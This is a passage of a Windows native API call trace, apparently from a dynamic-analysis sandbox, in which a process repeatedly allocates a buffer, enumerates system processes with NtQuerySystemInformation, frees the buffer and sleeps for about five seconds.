BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.743] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.750] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.757] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.763] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.771] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.778] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.785] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.791] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.798] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.804] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.811] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.818] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.826] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.834] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.842] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.850] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.857] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.865] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.869] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.873] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.880] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.886] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, 